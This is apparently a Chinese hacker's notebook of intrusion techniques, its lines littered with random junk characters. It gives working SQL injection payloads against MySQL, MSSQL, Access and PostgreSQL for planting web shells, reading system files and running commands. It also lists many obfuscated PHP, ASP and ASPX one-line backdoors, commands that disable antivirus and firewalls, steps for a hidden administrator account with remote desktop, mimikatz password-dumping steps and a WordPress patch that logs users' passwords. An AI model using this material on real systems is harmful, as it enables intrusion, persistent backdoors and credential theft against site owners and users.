* V1 Z/ x3 u6 [$ a
use test;
8 `7 u; y% ?1 v3 L9 a& m! Icreate table a (cmd text);
. x. T+ W: w: }/ B1 jinsert into a values ("set wshshell=createobject (""wscript.shell"") " );; |8 {4 J+ r! W# E2 O! O8 y
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
' v- t: j; a' Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );) i( v* h* @3 V4 S+ ~% ^) i# |
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
. _+ I$ e4 d7 s4 a* ?0 e% H: ]drop table a;& [# o; @# W4 L; _' A
$ Z- M; e! \6 Y% i. d( u& ^- Y英文版本:
b. O5 c( j/ Z; }5 w v4 K7 \1 v6 K
use test;
], N& \$ p+ u, |" _9 Xcreate table a (cmd text);- f, W1 C" V) }! {2 D
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
+ v5 {8 U! [& U" m: l5 x; Finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );1 v4 S" v0 c3 W8 E
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );4 n9 [& a* z1 I& @8 b. C6 q. E( Y' r
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";: c: c# B2 w8 h& L r; E: P" C
drop table a;
# j" a( e1 d: ~# k* ` ~) z5 ] g' ^4 k# d# D+ Z0 l
create table a (cmd BLOB);
O3 R1 n2 F% T+ Qinsert into a values (CONVERT(木马的16进制代码,CHAR));
% ?* a$ _6 V2 M5 gselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
" u2 e1 q1 M$ p+ }5 j; |drop table a;
7 Q8 i$ J2 I0 b6 B# o) b9 O
9 c# `$ D' l) `; k1 C- ]0 }: T记录一下怎么处理变态诺顿
/ E/ T" p& z5 |) G查看诺顿服务的路径" y3 Y0 z" _- t3 _) W% A# G/ m
sc qc ccSetMgr
4 Y' b* f) A3 |然后设置权限拒绝访问。做绝一点。。* d) ]" L# k5 {
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system1 h/ d, U2 B k7 T4 P5 D/ f: @5 J
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
. ^& N: q% P* f* ^$ [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators9 \2 i2 t6 R0 o: b5 m8 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone& v q& V7 L5 B! c$ v
' b1 K7 ~% w; w4 L% [1 r/ V然后再重启服务器
% e( R* o' f! y) q6 I8 |iisreset /reboot% {4 Q3 N8 ~8 y$ n" w" E
这样就搞定了。。不过完事后。记得恢复权限。。。。
! s" h! M3 l+ A9 E+ _; ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F& ?' j+ o* B. M8 p- l7 n% D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F! j( k) r2 F6 [7 K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
7 K0 B: v8 @) T# D" {$ xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
1 |+ U; \* ^. \3 D& Q) [ i1 M xSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
' h8 C P$ Y% ]3 ` B! _. \' @$ g
- \; P( J. q I5 UEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 U! ^" T2 ]: E# q+ T0 ^ n9 h) h6 I
postgresql注射的一些东西
' @, l# W; L t8 x F如何获得webshell
4 l1 y; M5 O1 qhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); / |% C5 j# o. u# D7 [
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); / R5 m2 y! L7 C
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
6 u' n1 Q. M5 Z4 x: ?$ D如何读文件
6 ~# Y% M% V* S; [http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
k0 ?" A0 c& R Rhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ T+ C) a! {& g: U4 ]
http://127.0.0.1/postgresql.php?id=1;select * from myfile;9 V4 W: I' V2 {4 {0 ?: o
7 d7 c3 E3 a* B, n
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
* w# _+ U N6 ~& R: G7 j1 M当然,这些的postgresql的数据库版本必须大于8.X+ r1 r- O& ]4 T: s
创建一个system的函数:
8 W4 M, p/ |1 h j1 p% i' tCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT9 j* E8 _3 S4 a2 ]; K2 y1 A) U3 g
0 o* P7 q8 _+ {% Y创建一个输出表:
- o5 d8 c5 A/ \+ WCREATE TABLE stdout(id serial, system_out text)
: [ z, a& S5 S( J9 U
6 i8 R1 R3 f2 n# Y执行shell,输出到输出表内:
9 L9 P' t3 V* F. I# eSELECT system('uname -a > /tmp/test')) ?5 H. k9 o# g/ `# i
2 [7 o5 p, B$ F9 N) p! F$ wcopy 输出的内容到表里面;2 Z% a8 I& {3 l/ e
COPY stdout(system_out) FROM '/tmp/test'
3 r$ Y* `& b! f& ~" [; _' Z7 ^& [* j ^: x
从输出表内读取执行后的回显,判断是否执行成功
! {+ p( b: R/ A4 T7 C) E
3 `+ e$ ~7 s, z6 {) n% PSELECT system_out FROM stdout
. u0 c9 A1 N0 Z( I/ |下面是测试例子
9 Q7 x0 E( [2 v% L
/ S* [8 c( _8 {$ Z* y! N; s o/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- : }; S2 d& I+ v3 N: G
1 D1 Y( N# _2 e
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'. ?* R% G7 K' h! v
STRICT --9 k- ?' L% H9 n
, X( e6 `' x- U; p( b! u S
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
( h; N0 w) z% h: a, `( Q8 s* {
. [, U0 A. C$ L( `/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
6 }: }. A) k6 a& k" S/ y5 I ^. d6 v" Z* h9 n2 L
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--, w, q1 H. i1 ]( ?0 f
net stop sharedaccess stop the default firewall
* e$ Q+ @ i3 t7 ^+ Lnetsh firewall show show/config default firewall; e6 W$ }+ e8 n6 w- S/ W
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
, {' d( K. ]- g8 q( |: Y2 N2 Hnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall. M+ n2 Q$ e0 ?& K/ s8 T, {
修改3389端口方法(修改后不易被扫出)
/ u. r4 _. c. P$ W0 h: N' j修改服务器端的端口设置,注册表有2个地方需要修改
# A, u1 D' f' o) J) x6 t: N1 Y0 j3 a0 f1 i9 @
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
. k; e9 f& u& v7 A1 P+ ^PortNumber值,默认是3389,修改成所希望的端口,比如60004 L2 `" \2 g! O" {/ a- v
" `1 E/ s! I0 y
第二个地方:! s3 N4 r' i! H6 Z$ E$ j% _
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
/ O7 T% y, `, w) `3 r1 m* c4 JPortNumber值,默认是3389,修改成所希望的端口,比如6000
- |6 P* r- ~: N3 `5 r5 d" c8 U% {! G0 ]) V \. |
现在这样就可以了。重启系统就可以了
: f4 Q; N2 v; v0 c' `8 n+ _7 N4 H3 H' b
查看3389远程登录的脚本
p' t3 M+ H* y; T2 t- B" {$ {$ ^. N保存为一个bat文件3 p8 O7 d6 N t6 d: a) S
date /t >>D:\sec\TSlog\ts.log
3 _" g8 |5 j+ g; ]( z! y- y: [time /t >>D:\sec\TSlog\ts.log' Y7 v1 b' }% W
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log1 I9 c+ W+ i. c* G
start Explorer
$ p; `; y0 ]( C* o. L j* b6 \
# t9 R( O& _# Y. h. w" c% D6 ?* {mstsc的参数:
/ R& d0 o. ~+ @! c# X
K, U0 H; }7 G9 o远程桌面连接' Q4 ]( }9 |6 v0 K
) [: O+ K% p0 ?8 W" |- a) r
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]) M" ?; e, l% M: |: F- h2 N
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
! q6 m; ]/ q/ S a1 _' W5 J
, W/ M" r# h2 O+ S* e) Q; W<Connection File> -- 指定连接的 .rdp 文件的名称。3 ]7 \; Z/ B3 w3 Q) u. ]
5 p6 ?9 }; _/ E. ]3 e* ]1 l' C
/v:<server[:port]> -- 指定要连接到的终端服务器。
. J: w4 x/ ?6 h
- B: }/ s$ D0 \( ]4 H; E o: o: w/console -- 连接到服务器的控制台会话。* r) x v2 v- k9 P2 h
. K( ~8 |( V* z! j& W/f -- 以全屏模式启动客户端。
9 N2 O* Z/ A9 { ?3 N! C: A. [4 ?9 ?7 [* L4 k# b9 Z' U4 A, n
/w:<width> -- 指定远程桌面屏幕的宽度。# d/ \4 p! L1 N$ I& J$ }, Y
- C v3 c! L& d0 |/h:<height> -- 指定远程桌面屏幕的高度。% K! s, f2 K, Y) D2 m
2 `: q/ G5 }% S( W( ?
/edit -- 打开指定的 .rdp 文件来编辑。
; Z+ z' V2 o9 J. Q7 p. G' a% E& {0 z" O+ ~' \; ?9 X
/migrate -- 将客户端连接管理器创建的旧版
- D5 F+ q5 U; W; {$ o" ?/ r连接文件迁移到新的 .rdp 连接文件。
: N+ G1 p0 Z5 Z( c
6 }9 Y# U( r: c
. b( c0 F$ g1 m+ V其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
( r$ Y( V- D# a4 r' d0 tmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
4 Z! L' W0 E0 H% z. `# j8 y( M0 q+ m) A k( s
命令行下开启3389
9 a! O! E9 t& h" B& onet user asp.net aspnet /add
4 e, m. w6 G# a3 L' V/ L, M1 m' Y. pnet localgroup Administrators asp.net /add, k- Z" a: K5 e- {" Y
net localgroup "Remote Desktop Users" asp.net /add
D4 P1 X2 X( ] Y% r1 C- oattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
1 g9 ]* V/ T1 `/ @) k* _8 D5 `+ Hecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
/ b9 N, S2 J4 secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1. F/ }' n* Q: `7 j7 f
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
. Q8 E9 z- [+ s; x8 X+ i" Dsc config rasman start= auto
4 Q. f" \3 T8 I! ~sc config remoteaccess start= auto+ z# F, H' W+ L! J S
net start rasman
( O) i, x! Z9 b8 m bnet start remoteaccess
3 G4 S7 `) P# C( a+ KMedia, @) d& M9 N9 [* I, ?7 ]
<form id="frmUpload" enctype="multipart/form-data"
* k# g! w7 L6 ~1 B. Uaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
5 A& j% Q& D/ @<input type="file" name="NewFile" size="50"><br>3 N5 P, i+ X& W5 m: W$ C& u, u
<input id="btnUpload" type="submit" value="Upload">, D' T3 z. e/ G: w' N
</form>: P# _: u/ ~* `$ m5 v2 N' V
% p. C! x- m1 j& a. @( J! o! A$ U
control userpasswords2 查看用户的密码
3 M3 \$ f) E" U, D8 Oaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
" D! t4 L! F6 h% |2 Q. T; q8 m1 `SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 h7 G, H8 r9 [( g
7 Z/ R! l5 s5 E" [9 c: J141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:# R; K" A9 J& n+ d
测试1:
+ @6 c; U" e6 R# ~SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) K8 A5 ]% p9 d6 }! p' X
' G. E+ E0 O8 X! e- m+ ~" i
测试2:, S s/ S" H1 C" H
9 x ~* W* d# T$ h6 w" U6 Zcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
' N" e6 K, c% ~# k5 B
: l$ {) Q1 f" s; ? o) Fdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--' |3 e! {( L. q3 g
7 ?' z6 F' E- c% @SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ e B, w! H _5 w
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令& D) U/ X5 S3 T$ P2 `
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;/ V8 p- R" e; A v0 ]8 v
net stop mcafeeframework M$ X/ j: x: y, j/ I
net stop mcshield; O* B) ~; r6 `, K
net stop mcafeeengineservice
/ {5 G) W4 M$ W6 C- znet stop mctaskmanager/ S; s/ I R- c2 Q
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
5 i E l0 [/ R. _& \9 n7 @! d7 @' F
VNCDump.zip (4.76 KB, 下载次数: 1) . K( ]8 p1 w! Y
密码在线破解http://tools88.com/safe/vnc.php- R# D- ^2 P. u
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取4 D4 M5 k3 l% g$ w
- L/ E# v! w, Q
exec master..xp_cmdshell 'net user': c4 I$ t7 ?# f* @; x, e
mssql执行命令。
+ F+ a7 n9 g! Q! b* g/ r! O获取mssql的密码hash查询% |0 T* D$ {" i" A4 O/ K
select name,password from master.dbo.sysxlogins
& I+ V9 L# L+ t! r! [- Q4 i7 t3 B1 _5 S( l: {% b
backup log dbName with NO_LOG;, s: y2 }+ U6 n% ^! X8 i
backup log dbName with TRUNCATE_ONLY;3 @- U- t- s6 i) l
DBCC SHRINKDATABASE(dbName);
; i' ~) u. {3 x. mmssql数据库压缩, ]5 `, b( L1 Z7 v
7 R- }( U( R# M
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK' N3 s6 W' Y/ ?6 k; ?) v
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。! D0 `. S* |7 R G
; N0 ]+ {! |# j1 Q: u/ k+ ^0 Fbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
$ e7 P" _- z+ W1 J7 K! B. v备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
4 `4 T! ]* E- F6 v/ ~& N0 [6 f7 |" g6 u6 Y( }
Discuz!nt35渗透要点:
7 G% a) o+ d& M$ k% f# ]5 d0 K6 K/ G2 l(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default3 r3 ^: q% ]' h1 m# I- S0 q5 N, o
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>( X: \# _6 u, |! A4 ^
(3)保存。
( l' M( L; n' Z0 r(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
9 N2 G9 B. E3 m; g$ ]2 l7 d& G$ Ed:\rar.exe a -r d:\1.rar d:\website\ v0 a; f) k5 c! q
递归压缩website! q* J% y% `3 Z% K
注意rar.exe的路径
7 y8 C e4 j' T/ y, x. }! F q) Y/ i% ?! n* D: ~% c6 C; ^' f' m+ s1 J
<?php
. A' v; p3 m# m* `: c. y/ I
& j3 y; a: n% Z& p$telok = "0${@eval($_POST[xxoo])}";7 v3 c; x$ L% E+ a3 }0 J
; o; N' B) |4 i
$username = "123456";1 f# i, b5 k7 K9 E2 ~
% D. O/ j7 D/ K# f$ n0 F9 F% y: Q e$userpwd = "123456";
& L j0 T g4 N0 o- y; d1 k3 a# @& T, w( b) @8 E; C
$telhao = "123456";9 r s4 m, O" g* N5 w' x
6 _+ x% @- d7 e% i% [1 }: Q8 q: z9 S
$telinfo = "123456";1 {; ~# R# G# L+ q2 m$ p# Y
2 r6 |6 m) u* v3 w- r1 J* A+ Z1 t
?>
- I' E2 `( S- \0 n0 bphp一句话未过滤插入一句话木马
- S( Q* E& o, i( d' [3 W5 f. v0 G" R& H( b; o; I: a# s
站库分离脱裤技巧
+ Y( D6 `" R" { ?; d4 R" P( Qexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
3 a0 p$ F( X" o. Zexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'2 x& G# P# j; d3 b* `7 a
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
8 F4 i- L5 q' `这儿利用的是马儿的专家模式(自己写代码)。
! a5 [) E! \- j3 D1 Z/ i% vini_set('display_errors', 1);
& O6 J* ^1 Z e, i2 e. {$ X' |" x& Lset_time_limit(0);% P+ m; M, [, {5 ^
error_reporting(E_ALL);+ A4 I9 ~5 ]' ?$ e" d3 I
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
! t2 ^2 S0 l4 P7 r2 y4 ?mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());, g& U- j& n+ q
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());; @- w* `( Z: `: I% C, ?; M* ^
$i = 0;- B0 M7 i7 m W
$tmp = '';
4 K0 L5 o' r/ zwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {# X( h% z( v( H2 N
$i = $i+1;
, b' N- @. { J $tmp .= implode("::", $row)."\n";3 e, c1 `7 {" k
if(!($i%500)){//500条写入一个文件8 t+ k5 W; r; X, Q9 l
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';" y# ]; H% @, a0 [# V' \
file_put_contents($filename,$tmp);
, z' L3 {/ {5 ^" T7 x $tmp = '';
8 a4 U% W2 x9 K u }
?1 ~/ D1 w! a4 o. k- K8 O}
4 O# I- `- H, j2 ?9 G( ~mysql_free_result($result);( c( E. g! d5 Z" l
, b/ }3 t; X3 V, R* @: \- e$ i8 n+ \$ T; ]+ R
3 p' }; w. n! ?/ f( J) T//down完后delete
! j' M( u) i7 G( L- ~( W8 p/ ^" |3 X; b0 {/ `
/ {; J& F% H3 C3 q. m) uini_set('display_errors', 1);( q, u$ ]( w/ g* h$ p
error_reporting(E_ALL);1 c5 E0 o4 |$ I) d/ S" ~9 e
$i = 0;
# @- m1 M7 w* u+ d- \while($i<32) {9 r+ D3 ~- Y8 ^9 r' w
$i = $i+1;
; E& j5 `8 j9 Y4 P% n- ]2 I+ P: N4 R# G $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
8 \( Q X8 {( F& } unlink($filename);
4 u7 A# U4 t* W3 H9 _ i}
: g* K; x# r; @7 khttprint 收集操作系统指纹
$ [: ~9 f4 N$ p; L扫描192.168.1.100的所有端口, k" v3 k- v" G3 J; M& h! `: X$ n7 w
nmap –PN –sT –sV –p0-65535 192.168.1.100
: F6 S0 J/ m. \2 w; bhost -t ns www.owasp.org 识别的名称服务器,获取dns信息: T/ M/ R- U; D; W
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
1 M7 [( N/ K. H5 s9 ]- ~Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
" P' S7 G9 G! {5 j
+ F9 d- E# r1 O* G: l8 h" VDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
9 P6 P8 i; G8 g9 A
& z# K3 G! M: ]! K MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
8 Z' q @- ~: R
0 u& V8 R+ _7 I5 d2 d" O* L Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* t0 x7 _* v& f( _& J6 T- V, G+ q! w$ I4 i! m4 F6 c; G7 f
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
5 d$ h; K/ @8 ?" }1 ^/ ^! d6 x) i7 n5 O; B+ u
http://net-square.com/msnpawn/index.shtml (要求安装)
3 I# s* p% k- M7 U1 i6 q; k1 {/ }* f5 v$ Y6 e, x6 y7 @
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)9 n& r0 N( X5 n/ [4 q& ?6 O* x
6 W( s9 J/ w8 B4 {
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
3 d, a: H* S4 v; ?+ `! s$ Mset names gb2312
/ {% T# H) _5 e$ L& ]+ }( X( x- u导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。' H% f1 S2 i; O! G& s! r, M C
$ U7 U; @7 h9 e) Hmysql 密码修改) p) X5 U3 u, X
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
5 W" B4 L" y, o* B7 Gupdate user set password=PASSWORD('antian365.com') where user='root';
+ s4 E: _' q6 y4 m+ Y$ Fflush privileges;
: i! o7 W" L, h$ ?! a! [高级的PHP一句话木马后门
: g& q2 R5 @& [1 G3 D# C3 O4 ]% b1 W E z" t/ w! \6 V% `
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀% H5 ^0 X9 c( M' i" L1 E+ ]# C ]& a' v. ^" j
5 f3 T9 e3 ^" O! r+ u; @
1、" L3 _( K' J; ^& z1 ]
5 |! O @ O$ m: x$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
: J% D5 i. ^+ z3 p( l# f5 I$ X5 t
" d% Q3 K$ O: A# ]2 f8 o8 a' Z$hh("/[discuz]/e",$_POST['h'],"Access");( E: H) s! n% G
, R/ d" s' p3 o, L6 G+ b//菜刀一句话: d( B" o+ d# E' q
7 W/ o$ }$ K R$ g( I2 }& {
2、" S5 s8 n3 J( }/ E( d4 ~
6 _7 P e* @6 a. x/ Y$filename=$_GET['xbid'];: p: v* l, B! b6 K' f2 e. C2 A
. U7 F, J% U, {8 i6 p; I2 \include ($filename);4 R' s, z. G% u" Z0 ]; J
5 E1 A& z7 o6 S/ L
//危险的include函数,直接编译任何文件为php格式运行
0 z& C. F/ q" j# t5 N( e
% n( w& z1 P0 k7 C: B. ~3、
# R7 l" w2 J y9 ?! s! i; V% q3 c% Q+ o p3 S: d
$reg="c"."o"."p"."y";1 c/ A7 Q) ~8 V9 P) M6 I
$ E8 S+ U. V4 `* Z8 H! i
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);+ O. r: S3 ^$ h- q/ o" u) h6 W
8 ]( n) T0 n( ?* S//重命名任何文件8 f7 q# Y: N4 S+ I( ]
' ^$ Q3 r" |0 F. ]& G k7 S4、& b! R& Z3 S0 P( F! ~$ } e. {
$ N Z0 w1 @* ?. h- ~4 p0 c$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";6 L) K1 N1 b e) T* D0 Y, j
; J/ j. ?; H: y; Y
$gzid("/[discuz]/e",$_POST['h'],"Access");2 W' a+ `5 Q3 N* Z: K+ A! ~/ L$ U
[5 u. Y& f1 d- Q0 x
//菜刀一句话
$ R y3 I$ B Y% o7 Z; q& U6 u* l h7 V, S) k$ @) j
5、include ($uid);
$ g1 Z5 J& E" b0 g/ M7 K2 c1 Y4 T0 l( n
T, w: Q! C* y Y& L//危险的include函数,直接编译任何文件为php格式运行,POST / g1 n: T& P" D7 w2 e, l9 o% @
2 o. B* X2 a$ j0 o) K. T$ N) V/ d2 D
" `- c$ r9 v! g6 K. k//gif插一句话: T: x% Q$ F- x7 r4 y I* r
$ C' k% K ?, f8 U6、典型一句话
: a `+ {5 U8 K) B, q0 `7 l0 ^2 N$ Y: ~; u) t4 J. c- P! g t5 M7 d0 {
程序后门代码. f8 X) q, L6 O9 W
<?php eval_r($_POST[sb])?>% ?$ J# W9 Y/ ^) p7 {3 N. R
程序代码5 k. ^6 k4 a. S# b. |
<?php @eval_r($_POST[sb])?>
% D7 v9 d( K- w6 J, C//容错代码
6 a F3 E1 e H& T; D程序代码
+ d* @( c5 k$ ~1 |8 t, H, Q. H; d8 ?<?php assert($_POST[sb]);?>5 N+ p- B$ ^5 X% L4 T
//使用lanker一句话客户端的专家模式执行相关的php语句' V0 h9 \& Y5 |
程序代码
. z H& G% c3 j, T( Z; B" k<?$_POST['sa']($_POST['sb']);?>
# {) _" S7 j8 f+ z6 t程序代码
2 l; J' @! L2 @* j7 x) s<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
) h8 {) J3 V9 |) ^8 Z程序代码
7 o; q# G8 q* a3 n5 O. S3 B. @<?php/ w/ p7 h" P3 I2 p' H$ d7 I7 ~0 K, y# G
@preg_replace("/[email]/e",$_POST['h'],"error");
: }( k- P/ O& h/ o7 L* T; x?>% Q- T2 W; Y- G. H
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入) v3 _- V) J" U/ U0 E) t$ g
程序代码* J A; K7 r) ^! `* H
<O>h=@eval_r($_POST[c]);</O>& k3 C& g, j+ c3 z) t2 h* E
程序代码
$ X6 q; s& t. v; m2 W<script language="php">@eval_r($_POST[sb])</script>. }- J8 p% z6 p7 d
//绕过<?限制的一句话
* x# b+ b( D7 h6 h" l* }! [2 N2 G- J4 I9 K/ g, v
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
1 T9 q& f0 _# Y) C, M# s详细用法:8 S- H: z1 z4 X+ x9 A
1、到tools目录。psexec \\127.0.0.1 cmd
# G* |# L- A) ~: O. k7 i" d2、执行mimikatz
6 Y- y& r6 L' p! u V* R3、执行 privilege::debug
5 ~; y4 }( p5 ]4、执行 inject::process lsass.exe sekurlsa.dll
0 _ F6 ^! J9 Z- E4 ^5、执行@getLogonPasswords5 G6 r4 f# K5 P2 z/ j3 Z% S. W- ~
6、widget就是密码6 k7 X6 D! A# E1 V- }: Q% ~: E* R
7、exit退出,不要直接关闭否则系统会崩溃。
& a6 W$ ]2 z$ h1 a) f' ]. J; r6 B' |2 M2 b5 T, m/ l/ L6 t: k
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
3 ^+ p; [: m- a5 E3 }! P8 l$ {; S& n9 Q; f
自动查找系统高危补丁3 c6 w+ N7 x p+ I9 q4 z- o
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt" C4 v: ^ H0 h- O0 P! _( ]; ]
! I) E7 f7 R9 {1 x5 p H' H突破安全狗的一句话aspx后门
3 h3 R# D6 q/ J<%@ Page Language="C#" ValidateRequest="false" %>
7 t' J7 {( K& G$ P; i e! M4 B1 C<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%># m. H9 Z$ R$ r5 `% G
webshell下记录WordPress登陆密码
1 W/ |" }$ x7 I$ t; {webshell下记录Wordpress登陆密码方便进一步社工
' p( A0 ]+ r1 C. |! t在文件wp-login.php中539行处添加:& T" Y& Y+ B! `2 k. k" }8 l7 n
// log password1 d% _( V3 q% N. {; }0 S1 ~2 o# V
$log_user=$_POST['log'];
$ k' {- y2 O2 r! V$log_pwd=$_POST['pwd'];
$ g+ {8 }4 W1 H; E% P: u5 J$log_ip=$_SERVER["REMOTE_ADDR"];
# [ O [) ^. {- Z+ V' p) V$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
" j# S* K! S" a/ Z. Z$ c$txt=$txt.”\r\n”;# X7 K0 v* h: ^9 c& Q5 g/ G
if($log_user&&$log_pwd&&$log_ip){$ d" [# F0 Y- r- z! i3 J1 U
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);% Y$ J- Z3 k) d! X
}" P @- g7 e( K
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% M; m: {4 [+ Z7 `3 O5 A& N
就是搜索case ‘login’
# Y) a2 X4 u# g在它下面直接插入即可,记录的密码生成在pwd.txt中,2 `6 y5 F8 x6 s5 W( W
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
